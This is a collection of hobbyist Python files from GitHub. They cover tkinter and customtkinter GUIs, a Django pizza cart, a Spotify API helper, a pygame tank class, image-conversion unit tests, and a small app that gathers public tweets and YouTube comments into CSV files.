+{"seq_id":"24113606082","text":"from tkinter import *\n\nmain_window = Tk()\nmain_window.title('Food Calculator')\nmain_window.geometry('300x200')\nmain_window.resizable(width=FALSE, height=FALSE)\nmain_window_bg_colour = 'gray77' # Set this as a variable that can be used across the code\nmain_window.configure(bg=main_window_bg_colour)\n\n\nmain_label = Label(main_window, text=\"Choose your fruit\")\nmain_label.place(relx=0.5, y=15, anchor=CENTER)\nmain_label.configure(bg=main_window_bg_colour)\n\nradio_button_variable = IntVar() # Define variable as integer\nprice_result = IntVar() # Define variable as integer\n\n\ndef calculate_price():\n radio_button_value = int(radio_button_variable.get()) # Make sure this variable is an integer\n input_weight_value = int(input_weight_entry.get()) # Make sure this variable is an integer\n price = radio_button_value * input_weight_value # Make the calculations and assign the value to a variable\n price_result.set(price) # Set the \"price_result\" variable as the value of the \"price\" variable\n\n # price_result.set(int(radio_button_variable.get()) * int(input_weight_entry.get())) # Same as the above in one line\n\n\nradio_button_apple = Radiobutton(main_window, text=\"Apple\", variable=radio_button_variable, value=10)\nradio_button_apple.place(x=5, y=40)\nradio_button_apple.configure(bg=main_window_bg_colour)\n\nradio_button_banana = Radiobutton(main_window, text=\"Banana\", variable=radio_button_variable, value=11)\nradio_button_banana.place(x=5, y=60)\nradio_button_banana.configure(bg=main_window_bg_colour)\n\nradio_button_orange = Radiobutton(main_window, text=\"Grapes\", variable=radio_button_variable, value=15)\nradio_button_orange.place(x=5, y=80)\nradio_button_orange.configure(bg=main_window_bg_colour)\n\nradio_button_apple = Radiobutton(main_window, text=\"Kiwi\", variable=radio_button_variable, value=12)\nradio_button_apple.place(x=100, y=40)\nradio_button_apple.configure(bg=main_window_bg_colour)\n\nradio_button_banana = Radiobutton(main_window, text=\"Pear\", variable=radio_button_variable, value=8)\nradio_button_banana.place(x=100, y=60)\nradio_button_banana.configure(bg=main_window_bg_colour)\n\nradio_button_orange = Radiobutton(main_window, text=\"Orange\", variable=radio_button_variable, value=5)\nradio_button_orange.place(x=100, y=80)\nradio_button_orange.configure(bg=main_window_bg_colour)\n\n\ninput_weight_entry = Entry(main_window, width=10) # Set this variable as an \"entry\" type one in the window called \"main_window\"\ninput_weight_entry.place(x=100, y=130)\n\ninput_weight_entry_label = Label(main_window, text=\"Weight (kg): \")\ninput_weight_entry_label.place(x=5, y=132)\ninput_weight_entry_label.configure(bg=main_window_bg_colour)\n\ncalculate_price_entry = Entry(main_window, width=10, textvariable=price_result) # Output the \"price_result\" variable value\ncalculate_price_entry.place(x=100, y=160)\n\ncalculate_price_button = Button(main_window, text='Calc', command= lambda : calculate_price()) # When clicked run the \"calculate_price\" function\ncalculate_price_button.place(x=50, y=162)\ncalculate_price_button.configure(highlightbackground=main_window_bg_colour)\n\nmain_window.mainloop()","repo_name":"TheFREAK69/Udemy-Master_Tkinter_By_Building_5_Fully_Functioning_Apps","sub_path":"Project 1 - Food Calculator.py","file_name":"Project 1 - Food Calculator.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39711700128","text":"# -*- coding: utf-8 -*-\nimport time\n\nfrom selenium import webdriver\n\nfrom share import unittest123321\n\n\nclass WebdriverDemo(unittest123321.TestCase):\n def setUp(self):\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(30)\n self.base_url = \"http://test.paymax.cc\"\n self.verificationErrors = []\n self.accept_next_alert = True\n\n def test_webdriver_demo(self):\n driver = self.driver\n driver.maximize_window()\n\n '''访问地址'''\n driver.get(self.base_url + \"/\")\n #通过CSS路径定位:\n # driver.find_element_by_css_selector(\"a[class='button blue cta']\").click()\n #通过XPATH路径定位\n # driver.find_element_by_xpath(\".//*[@id='bgstylec']/div[2]/div/p/a\").click()\n # driver.find_element_by_css_selector(\"button[class='btn btn-primary none']\").click() #登录\n driver.find_element_by_css_selector(\"button[class='btn btn-success']\").click()\n\n time.sleep(3)\n\n def close_alert_and_get_its_text(self):\n try:\n alert = self.driver.switch_to_alert()\n alert_text = alert.text\n if self.accept_next_alert:\n alert.accept()\n else:\n alert.dismiss()\n return alert_text\n finally:\n self.accept_next_alert = True\n\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\n\nif __name__ == \"__main__\":\n unittest123321.main()","repo_name":"hivencent/paymax-test","sub_path":"demo/share_2_front_end.py","file_name":"share_2_front_end.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"31568591310","text":"from django.shortcuts import render, redirect\nfrom orders.forms import PizzaForm, SubForm, PastaForm, SaladForm, DinnerPlatterForm\nfrom orders.models import Pizza, Sub, Pasta, Salad, DinnerPlatter\nfrom cart.models import CartItem, OrderItem\nfrom django.db.models import Sum\nfrom decimal import Decimal\n\n\n# Create your views here.\ndef cart(request):\n if request.method == \"POST\":\n if request.POST['menu_item'] == 'Pizza':\n form = PizzaForm(request.POST)\n\n if form.is_valid():\n form = form.cleaned_data\n # Get the form data to build a Pizza and CartItem\n menu = \"Pizza\"\n style = form['style']\n size = form['size']\n is_special = False\n if 'is_special' in request.POST:\n is_special = True\n num_toppings = form['num_toppings']\n topping_list = []\n for topping in form['toppings']:\n topping_list.append(str(topping))\n toppings = \", \".join(topping_list)\n\n # Lookup price\n if is_special:\n # numtoppings doesn't matter\n menu_pizza = Pizza.objects.get(style=style, size=size, is_special=is_special)\n else:\n menu_pizza = Pizza.objects.get(style=style, size=size, num_toppings=num_toppings, is_special=is_special)\n price = menu_pizza.price\n print(price)\n\n # Create the Cart Item\n order = CartItem(menu=menu, size=size, style=style, additional=toppings, is_special=is_special, user_id=request.user.id, price=price)\n order.save()\n\n elif request.POST['menu_item'] == 'Sub':\n form = SubForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Sub'\n ingredients = form['ingredients']\n size = form['size']\n extras_list = []\n added_cost = Decimal(0.00)\n for extra in form['extras']:\n extras_list.append(str(extra))\n added_cost += extra.added_cost\n\n extras = \", \".join(extras_list)\n\n # Lookup price\n menu_sub = Sub.objects.get(ingredients=ingredients, size=size)\n price = menu_sub.price + Decimal(added_cost)\n\n # Create the Cart Item\n order = CartItem(menu=menu, size=size, style=ingredients, additional=extras, is_special=False, user_id=request.user.id, price=price)\n order.save()\n\n redirect('index')\n elif request.POST['menu_item'] == 'Pasta':\n form = PastaForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Pasta'\n style = form['style']\n\n # Lookup price\n menu_pasta = Pasta.objects.get(style=style)\n price = menu_pasta.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, user_id=request.user.id, price=price)\n order.save()\n elif request.POST['menu_item'] == 'Salad':\n form = SaladForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'Salad'\n style = form['style']\n\n # Lookup price\n menu_salad = Salad.objects.get(style=style)\n price = menu_salad.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, user_id=request.user.id, price=price)\n order.save()\n elif request.POST['menu_item'] == 'DinnerPlatter':\n form = DinnerPlatterForm(request.POST)\n if form.is_valid():\n form = form.cleaned_data\n menu = 'DinnerPlatter'\n style = form['style']\n size = form['size']\n\n # Lookup price\n menu_dinner_platter = DinnerPlatter.objects.get(style=style, size=size)\n price = menu_dinner_platter.price\n\n # Create the Cart Item\n order = CartItem(menu=menu, style=style, size=size, user_id=request.user.id, price=price)\n order.save()\n else:\n print(\"Post Error\")\n redirect('index')\n\n cart_items = get_cart_items(request)\n if cart_items:\n total_cost = Decimal(cart_items.aggregate(Sum('price'))['price__sum'])\n else:\n total_cost = 0\n\n context = {\n 'cart_items': cart_items,\n 'num_cart_items': cart_items.count(),\n 'total_cost': total_cost\n }\n\n return render(request, 'cart/cart.html', context)\n\n else:\n\n # Display Shopping Cart for GET request\n cart_items = get_cart_items(request)\n if cart_items:\n total_cost = Decimal(cart_items.aggregate(Sum('price'))['price__sum'])\n else:\n total_cost = 0\n\n context = {\n 'cart_items': cart_items,\n 'num_cart_items': cart_items.count(),\n 'total_cost': total_cost\n }\n return render(request, 'cart/cart.html', context)\n\n\ndef checkout(request):\n if request.method == \"POST\":\n\n cart_items = get_cart_items(request)\n\n for item in cart_items:\n menu = item.menu\n size = item.size\n style = item.style\n additional = item.additional\n is_special = item.is_special\n price = item.price\n user_id = item.user_id\n order = OrderItem(menu=menu, size=size, style=style, additional=additional, is_special=is_special, price=price, user_id=user_id)\n order.save()\n item.delete()\n\n all_order_items = OrderItem.objects.order_by('is_complete', 'created_at')\n\n user_order_items = all_order_items.filter(user_id=request.user.id)\n cart_items = get_cart_items(request)\n\n context = {\n 'cart_items': cart_items,\n 'all_order_items': all_order_items,\n 'user_order_items': user_order_items,\n 'num_cart_items': cart_items.count(),\n }\n\n return render(request, 'cart/checkout.html', context)\n else:\n all_order_items = OrderItem.objects.order_by('is_complete', 'created_at')\n\n user_order_items = all_order_items.filter(user_id=request.user.id)\n cart_items = get_cart_items(request)\n\n context = {\n 'cart_items': cart_items,\n 'all_order_items': all_order_items,\n 'user_order_items': user_order_items,\n 'num_cart_items': cart_items.count(),\n }\n\n return render(request, 'cart/checkout.html', context)\n\n\ndef remove(request, cart_item_id):\n cart_item = CartItem.objects.filter(id=cart_item_id)\n cart_item.delete()\n return redirect('cart')\n\n\ndef mark_complete(request, order_item_id):\n order_item = OrderItem.objects.filter(id=order_item_id)\n order_item.update(is_complete=True)\n return redirect('checkout')\n\n\n# Helper Funcitons\ndef get_cart_items(request):\n cart_items = CartItem.objects.filter(user_id=request.user.id)\n return cart_items\n","repo_name":"learyjk/pizza-cs50","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"50115573623","text":"#!/usr/bin/env python3\nimport requests\nimport json\n\nSEARCH_PLAYLIST_ENDPOINT ='https://api.spotify.com/v1/search?type=track'\nPLAYBACK_ENDPOINT = 'https://api.spotify.com/v1/me/player/queue'\n\ndef searchForTrack(query, token): #returns a dictionary of responses\n searchParams = {'type': 'track'}\n searchParams['q'] = query\n searchParams['market'] = 'US'\n searchParams['limit'] = 50\n myheaders = {\"Accept\":\"application/json\"}\n myheaders[\"Content-Type\"] = \"application/json\"\n myheaders[\"Authorization\"] = \"Bearer \" + token\n resp = requests.get(SEARCH_PLAYLIST_ENDPOINT, params=searchParams, headers=myheaders)\n #writeToFile(json.dumps(resp.json()))\n return json.dumps(resp.json())\n\ndef doTheThing(uri, token):\n myheaders = {\"Accept\":\"application/json\"}\n myheaders[\"Content-Type\"] = \"application/json\"\n myheaders[\"Authorization\"] = \"Bearer \" + token\n searchParams = {'uri':uri}\n resp = requests.post(PLAYBACK_ENDPOINT, params=searchParams, headers=myheaders)\n return resp\n\ndef testQueue():\n doTheThing('spotify:track:3okk47CKOqAm1TXmVPzNYf')\n\ndef testSearch():\n testQ = \"Something About Us Daft Punk\"\n tok = 'BQArMtuw7RqCYEOG4ZIO2EnsQJV9_l8gpWl9CTWeQTB9ClYc5VDasCf7Kag_kODpCK3s1OoXXIePzJ15WjyVyPmKLlQtuy_vRHt2dpObg35AijY-N77yj71nuP7Y3eDTvLpAy20vA8zCzDMAOYR2LHF6EAOWygx_GBwpGMJRUD7N1zDM3wSXIpAGmP4'\n log = open('testLog.txt', 'w')\n response = searchForTrack(testQ, tok)\n log.close()\n print(response)\n\ndef writeToFile(dict):\n f = open('httpResponse.json', 'w')\n f.write(dict)\n f.close()","repo_name":"scaboodles/dj_hotkey","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"74346679294","text":"from tkinter import *\nfrom pojeto.banco.conexao import Conexao\nfrom pojeto.controler.cadastrarVC import CadastrarVC\nfrom functools import partial\n\n\n\n\nclass Vendas:\n def abrirVendas(self):\n janela = Tk() # Cria a tela principal\n janela.resizable(0, 0)\n quadro = Frame(janela, bd=2, relief=\"raised\", pady=10, padx=10)\n quadro.place(x=20, y=20) # posiciona o quadro na posição xy\n fonte = ('Arial', '16', 'bold') # Define o padrão de fonte\n\n\n def btnVendas():\n cadastrar = CadastrarVC(edProduto.get(), edVender.get(), edInvisivel.get(), edFranquia.get())\n cadastrado = cadastrar.CadastrarVenda()\n return cadastrado\n\n\n#FORMULARIO\n\n\n lbProduto = Label(quadro, text=\"Produto:\", font=fonte, pady=10, padx=10)\n lbVender = Label(quadro, text=\"Vender:\", font=fonte, pady=10, padx=10)\n lbFranquia = Label(quadro, text=\"Franquia:\", font=fonte, pady=10, padx=10)\n edProduto = Entry(quadro, font=fonte, width=25)\n edInvisivel = Entry(quadro, font=fonte, width=25, text='7')\n edVender = Entry(quadro, font=fonte, width=25)\n edFranquia = Entry(quadro, font=fonte, width=25)\n\n\n btVenda = Button(quadro, font=fonte, text=\"Vender\", fg=\"green\",\n activebackground=\"#A9A9A9\", activeforeground=\"white\")\n btVenda['command'] = partial(btnVendas)\n\n\n #EXIBINDO OS ITENS\n\n\n lbProduto.grid(row=0, column=0)\n edProduto.grid(row=0, column=1)\n lbVender.grid(row=2, column=0)\n edVender.grid(row=2, column=1)\n lbFranquia.grid(row=3, column=0)\n edFranquia.grid(row=3, column=1)\n\n\n\n btVenda.grid(row=5, column=1)\n\n\n\n\n #photoLupa = PhotoImage(file=\"img/lupa2.png\")\n #logoLupa = photoLupa.subsample(15, 15)\n btBusca = Button(quadro, bd=1) #image=logoLupa\n btBusca.grid(row=0, column=3)\n\n # criando lb mensagem\n lbMensagem = Label(janela, text=\"\", font=fonte)\n lbMensagem.place(x=20, y=280)\n\n\n janela.geometry(\"640x320+200+200\") # Larg x Alt + DistaciaEsq + DistandiaTop\n janela.title(\"Consulta, Cadastro e Alteração\") # Define o titulo da janela\n #janela.iconbitmap(\"img/icone.ico\")\n janela.mainloop() # Exibe a janela\n\n","repo_name":"LuanKennedy/Python","sub_path":"pojeto/view/venda.py","file_name":"venda.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"29465815620","text":"import pygame\nfrom tank import Tank\n\nclass Player(Tank):\n\tdef __init__(self, game, level, position=None, direction=None, filename=None):\n\t\tsuper().__init__(game, level, side=0, position=None, direction=None, filename=None)\n\t\tself.start_position = position\n\t\tself.start_direction = direction\n\t\tself.lives = 3\n\t\tself.score = 0 # total score\n\n\t\t# store how many bonuses in this stage this player has collected 计分板\n\t\tself.trophies = {\n\t\t\t\"bonus\" : 0,\n\t\t\t\"enemy0\" : 0,\n\t\t\t\"enemy1\" : 0,\n\t\t\t\"enemy2\" : 0,\n\t\t\t\"enemy3\" : 0\n\t\t}\n\t\t\n\t\tif filename == None:\n\t\t\tfilename = (0, 0, 16*2, 16*2)\n\t\tself.image = self.game.sprites.subsurface(filename)\n\t\tself.image_up = self.image\n\t\tself.image_left = pygame.transform.rotate(self.image, 90)\n\t\tself.image_down = pygame.transform.rotate(self.image, 180)\n\t\tself.image_right = pygame.transform.rotate(self.image, 270)\n\n\t\tif direction == None:\n\t\t\tself.rotate(self.DIR_UP, False)\n\t\telse:\n\t\t\tself.rotate(direction, False)\n\n\tdef move(self, direction):\n\t\t\"\"\" move player if possible \"\"\"\n\t\tif self.state == self.STATE_EXPLODING:\n\t\t\tif not self.explosion.active:\n\t\t\t\tself.state = self.STATE_DEAD\n\t\t\t\tdel self.explosion\n\n\t\tif self.state != self.STATE_ALIVE:\n\t\t\treturn\n\n\t\tif self.direction != direction: # rotate player\n\t\t\tself.rotate(direction)\n\n\t\tif self.paralised: # 瘫痪\n\t\t\treturn\n\n\t\t# speed: px per move, default = 2\n\t\tif direction == self.DIR_UP: # move player\n\t\t\tnew_position = [self.rect.left, self.rect.top - self.speed]\n\t\t\tif new_position[1] < 0:\n\t\t\t\treturn\n\t\telif direction == self.DIR_RIGHT:\n\t\t\tnew_position = [self.rect.left + self.speed, self.rect.top]\n\t\t\tif new_position[0] > (416 - 26):\n\t\t\t\treturn\n\t\telif direction == self.DIR_DOWN:\n\t\t\tnew_position = [self.rect.left, self.rect.top + self.speed]\n\t\t\tif new_position[1] > (416 - 26):\n\t\t\t\treturn\n\t\telif direction == self.DIR_LEFT:\n\t\t\tnew_position = [self.rect.left - self.speed, self.rect.top]\n\t\t\tif new_position[0] < 0:\n\t\t\t\treturn\n\n\t\tplayer_rect = pygame.Rect(new_position, [26, 26])\n\n\t\t# collisions with tiles\n\t\tif player_rect.collidelist(self.level.obstacle_rects) != -1:\n\t\t\treturn # ignore update\n\n\t\t# collisions with other players\n\t\tfor player in self.game.players:\n\t\t\tif player != self and player.state == player.STATE_ALIVE and player_rect.colliderect(player.rect) == True:\n\t\t\t\treturn # ignore update\n\n\t\t# collisions with enemies\n\t\tfor enemy in self.game.enemies:\n\t\t\tif player_rect.colliderect(enemy.rect) == True:\n\t\t\t\treturn # ignore update\n\n\t\t# collisions with bonuses\n\t\tfor bonus in self.game.bonuses:\n\t\t\tif player_rect.colliderect(bonus.rect) == True:\n\t\t\t\tself.bonus = bonus\n\n\t\t#if no collision, move player\n\t\tself.rect.topleft = (new_position[0], new_position[1])\n\n\tdef reset(self):\n\t\t\"\"\" reset player \"\"\"\n\t\tself.rotate(self.start_direction, False)\n\t\tself.rect.topleft = self.start_position\n\t\tself.superpowers = 0\n\t\tself.max_active_bullets = 1\n\t\tself.health = 100\n\t\tself.paralised = False\n\t\tself.paused = False\n\t\tself.pressed = [False] * 4\n\t\tself.state = self.STATE_ALIVE","repo_name":"Movelocity/battle-city","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"279148752","text":"import customtkinter as ctk\nfrom .settings import *\nfrom PIL import Image\nimport os\nfrom .components import TitleLabel, SmallLabelButton\nfrom typing import Callable\n\n\ndef change_theme():\n \"\"\"\n This function changes the theme of the app, is called by the button on the title bar\n \"\"\"\n\n if ctk.get_appearance_mode() == \"Dark\":\n ctk.set_appearance_mode(\"light\")\n else:\n ctk.set_appearance_mode(\"dark\")\n\n\nclass TitleBar(ctk.CTkFrame):\n \"\"\"\n The title bar that is present in every frame, the text in the title can be changed by a given method\n \"\"\"\n def __init__(self, master,\n title_text,\n refresh_command=None,\n back_command: Callable[..., None] | None = None):\n super().__init__(master,\n fg_color=\"transparent\")\n\n self.back_command = back_command\n\n # The label containing the text that explains what the current scene is showing\n self.title_label = TitleLabel(self,\n title_text)\n\n self.title_label.grid(row=0, column=0, sticky=\"nw\", pady=(DEFAULT_PAD, 0), padx=DEFAULT_PAD)\n\n if self.back_command is not None:\n self.back_button = SmallLabelButton(self,\n text=\"Back\",\n width=0,\n height=0,\n border_spacing=0,\n command=self.back_command)\n self.back_button.grid(row=1, column=0, sticky=\"w\", padx=DEFAULT_PAD)\n self.title_label.grid_configure(pady=(0, 0))\n\n # The image within the theme change button\n self.theme_image = ctk.CTkImage(\n light_image=Image.open(os.path.join(os.getcwd(), \"images/dark-theme.png\")),\n dark_image=Image.open(os.path.join(os.getcwd(), \"images/light-theme.png\")),\n size=(30, 30)\n )\n\n # The button that changes the theme when clicked\n self.theme_button = ctk.CTkButton(\n self,\n fg_color=\"transparent\",\n image=self.theme_image,\n command=change_theme,\n text=\"\",\n width=45,\n height=45,\n hover_color=BUTTON_HOVER_COLOR,\n corner_radius=8\n )\n self.theme_button.grid(row=0, rowspan=2, column=2, sticky=\"e\", pady=DEFAULT_PAD, padx=(0, DEFAULT_PAD))\n\n self.command = refresh_command\n\n if self.command is not None:\n self.refresh_image = ctk.CTkImage(\n light_image=Image.open(os.path.join(os.getcwd(), \"images/light-refresh.png\")),\n dark_image=Image.open(os.path.join(os.getcwd(), \"images/dark-refresh.png\")),\n size=(30, 30)\n )\n\n self.refresh_button = ctk.CTkButton(\n self,\n fg_color=\"transparent\",\n image=self.refresh_image,\n command=self.command,\n text=\"\",\n width=45,\n height=45,\n hover_color=BUTTON_HOVER_COLOR,\n corner_radius=8\n )\n\n self.refresh_button.grid(row=0, rowspan=2, column=1, sticky=\"e\", **DEFAULT_PAD_COMPLETE)\n\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=0)\n self.columnconfigure(0, weight=1)\n self.columnconfigure([1, 2], weight=0)\n","repo_name":"bilboderbyshire/school-report-writer","sub_path":"scripts/title_bar.py","file_name":"title_bar.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41222589494","text":"import os\nimport unittest\n\nfrom numpy.testing import assert_array_equal\n\nfrom tests.base import FIXTURES_DIR, SWORD_PNG_PATH\n\nfrom pixels2svg.utils import pixel\n\nIMAGE_FORMATS_DIR = os.path.join(FIXTURES_DIR, 'formats')\n\n\nclass TestUtilsPixel(unittest.TestCase):\n\n def test_id_to_from_rgba(self):\n\n self.assertEqual(\n (184, 0, 255, 54),\n pixel.id_to_rgba(pixel.rgba_to_id((184, 0, 255, 54)))\n )\n\n def test_id_to_from_rgba_array(self):\n\n img = pixel.read_image(SWORD_PNG_PATH)\n\n assert_array_equal(\n img,\n pixel.id_array_to_rgba_array(pixel.rgba_array_to_id_array(img))\n )\n\n def test_read_image(self):\n image_arrays = []\n for filename in os.listdir(IMAGE_FORMATS_DIR):\n image_path = os.path.join(IMAGE_FORMATS_DIR, filename)\n image_arrays.append(pixel.read_image(image_path))\n array_base = image_arrays[0]\n for array_comp in image_arrays[1:]:\n assert_array_equal(array_base, array_comp)\n","repo_name":"ValentinFrancois/pixels2svg","sub_path":"tests/test_utils_pixel.py","file_name":"test_utils_pixel.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"}
+{"seq_id":"12293428351","text":"import os\nimport logging\nimport config\nimport googleapiclient.discovery\nimport googleapiclient.errors\nimport tweepy\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport pandas as pd\nimport dfgui\nimport csv\nfrom tkinter import *\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter.messagebox import showinfo\nfrom functools import partial\n\n \ndef twitter(search):\n global errorlabel\n if errorlabel:\n errorlabel.destroy()\n search = search.get()\n with open('searchlog.txt', 'a+') as f:\n f.write(search)\n f.write('\\n')\n f.close()\n #api keys provided by twitter\n consumer_key = config.consumer_key\n consumer_secret = config.consumer_secret\n access_key= config.access_key\n access_secret = config.access_secret\n tweet_num = 8\n tweets = []\n data = []\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_key, access_secret)\n api = tweepy.API(auth,wait_on_rate_limit=True)\n #getting results from search \n results = tweepy.Cursor(api.search_tweets,q=search+ \" -filter:retweets\",\n lang=\"en\").items(tweet_num)\n #filling up data into lists\n for status in results:\n if status.lang == 'en':\n data = {'User': status.user.name,\n 'Account name': '@'+status.user.screen_name, \n 'Tweet': status.text, \n 'Time': status.created_at,\n 'Nr of retweets': status.retweet_count,\n 'Nr of favorited': status.favorite_count}\n tweets.append(data)\n if len(data):\n #coverting that data into a csv and gui\n twitinfo = pd.DataFrame(tweets) \n twitinfo.head()\n twitinfo.to_csv('twitter.csv', mode='a+',encoding='utf-8')\n print (twitinfo)\n dfgui.show(twitinfo)\n \n else:\n errorlabel = Label(tk, text=\"No data available for search, please retry\", bg='#ffffff')\n errorlabel.place(x=65, y=300)\n with open('errorlogs.txt', 'a+') as f:\n f.write(\"No data available for \")\n f.write(search)\n f.write('\\n')\n f.close()\ndef youtube(search):\n global errorlabel\n if errorlabel:\n errorlabel.destroy()\n search = search.get()\n with open('searchlog.txt', 'a+') as f:\n f.write(search)\n f.write('\\n')\n f.close()\n rows = []\n videoID = []\n SCOPES = 'https://www.googleapis.com/auth/youtube.force-ssl'\n api_service_name = \"youtube\"\n api_version = \"v3\"\n API_KEY = config.API_KEY\n youtube = googleapiclient.discovery.build(\n api_service_name, api_version, developerKey = API_KEY)\n #searching for video\n request = youtube.search().list(\n part=\"id,snippet\",\n type='video',\n q=search,\n videoDuration='any',\n videoDefinition='any',\n maxResults=1,\n fields=\"nextPageToken,items(id(videoId),snippet(publishedAt,channelId,channelTitle,title,description))\"\n )\n response = request.execute()\n #for each video found looks through comments\n for items in response['items']:\n videoID.append(items['id']['videoId'])\n try:\n for item in videoID:\n video_response=youtube.commentThreads().list(\n part='id,snippet,replies',\n videoId=item,\n maxResults=8\n ).execute()\n #grabs the comments and places them in list\n for item in video_response['items']:\n comment = str(item['snippet']['topLevelComment']['snippet']['textDisplay'])\n rows.append([\n items['snippet']['channelTitle'],\n items['snippet']['title'],\n items['snippet']['description'],comment])\n except:\n with open('errorlogs.txt', 'a+') as f:\n f.write(search)\n f.write(\" ,video has comments disabled\")\n f.write('\\n')\n f.close()\n print(search,\" video has comments disabled\")\n \n if len(rows):\n #coverts into an csv and gui\n ytinfo = pd.DataFrame(rows, columns = [\"Channel Name\", \"Title\", \"Description\", \"Comment\" ])\n ytinfo.to_csv('youtube.csv',mode='a+', encoding='utf-8')\n print(ytinfo)\n dfgui.show(ytinfo)\n else:\n errorlabel = Label(tk, text=\"No data available for search, please retry\", bg='#ffffff')\n errorlabel.place(x=65, y=300)\n with open('errorlogs.txt', 'a+') as f:\n f.write(\"No data available for \")\n f.write(search)\n f.write('\\n')\n f.close()\ndef csv():\n filetypes = (\n ('csv files', '*.csv'),\n ('All files', '*.csv*')\n )\n\n filename = fd.askopenfilename(\n title='Open a file',\n initialdir='/',\n filetypes=filetypes)\n if filename:\n openedCSV = pd.read_csv(filename)\n if (\"twitter.csv\" in str(filename)):\n new = openedCSV[~openedCSV['Nr of retweets'].isin(['Nr of retweets'])]\n dfgui.show(new)\n elif(\"youtube.csv\" in str(filename)):\n new = openedCSV[~openedCSV['Channel Name'].isin(['Channel Name'])]\n dfgui.show(new)\n else:\n dfgui.show(openedCSV)\ndef viewHistory():\n tk = Tk()\n tk.geometry(\"600x500\")\n tk.title(\"History file\")\n txtarea = Text(tk, width=600, height=500, bg='#f1f3f7')\n txtarea.place(x=0, y=0)\n try:\n tf = open(\"searchlog.txt\", \"r\")\n txtarea.insert(END, tf.read())\n tf.close()\n except:\n print(\"searchlog file doesn't exist yet\")\ndef clearHistory():\n with open(\"searchlog.txt\", \"w\") as tf:\n tf.write(\"\")\n tf.close()\ndef on_click(event):\n if searchEntry.cget('fg') == 'grey':\n searchEntry.delete(0, \"end\")\n searchEntry.insert(0, '')\n\n \n#building gui\ntk = Tk()\ntk.geometry(\"720x405\")\ntk.title(\"BuzzHunt\")\ntk['bg']='#ffffff'\n\ntry:\n photo = PhotoImage(file = \"images/buzz.png\")\n logo1 = PhotoImage(file = \"images/logo1.png\")\n logo2 = PhotoImage(file = \"images/logo2.png\")\n chooseOne = PhotoImage(file = \"images/chooseOne.png\")\n ytButton = PhotoImage(file = \"images/ytbutton.png\")\n twButton = PhotoImage(file = \"images/twbutton.png\")\n csvButton = PhotoImage(file = \"images/csvbutton.png\")\n cHistory = PhotoImage(file = \"images/clearHistory.png\")\n vHistory = PhotoImage(file = \"images/viewHistory.png\")\nexcept:\n print(\"Images not found\")\ntk.iconphoto(False, photo)\n\nlabel1 = Label(image = logo1, bg='#ffffff').place(x=300, y=0) \nlabel2 = Label(image = logo2, bg='#ffffff').place(x=0, y=0)\nlabel3 = Label(image = chooseOne, bg='#ffffff').place(x=65, y=210)\nsearch = StringVar()\nerrorlabel = None\nsearchEntry = Entry(tk, textvariable=search, bg='#f9f9f9', width = 25)\nsearchEntry.place(x=66, y=180)\nsearchEntry.insert(0, 'Search..')\nsearchEntry.bind('', on_click)\nsearchEntry.config(fg = 'grey')\n\n\nyoutube = partial(youtube, search)\ntwitter = partial(twitter, search)\nb1 = Button(tk, text=\"On Twitter\", command=twitter, bg='#00acee', image=twButton,highlightthickness = 0, bd = 0).place(x=160, y=240)\nb2 = Button(tk, text=\"On YouTube\", command=youtube, bg='#c4302b', image=ytButton,highlightthickness = 0, bd = 0).place(x=65, y=240)\nb3 = Button(tk, text=\"Open CSV File\", command=csv, bg='#7289DA', image=csvButton,highlightthickness = 0, bd = 0).place(x=255, y=240)\nb4 = Button(tk, text=\"View History\", command=viewHistory, bg='#ffffff',image=vHistory, highlightthickness=0, bd=0).place(x=65, y=360)\nb5 = Button(tk, text=\"Clear History\", command=clearHistory, bg='#ffffff', image=cHistory, highlightthickness=0, bd=0).place(x=171, y=360)\ntk.mainloop() \n","repo_name":"Saad-iit/OISNT_Project","sub_path":"FinalOistproject.py","file_name":"FinalOistproject.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
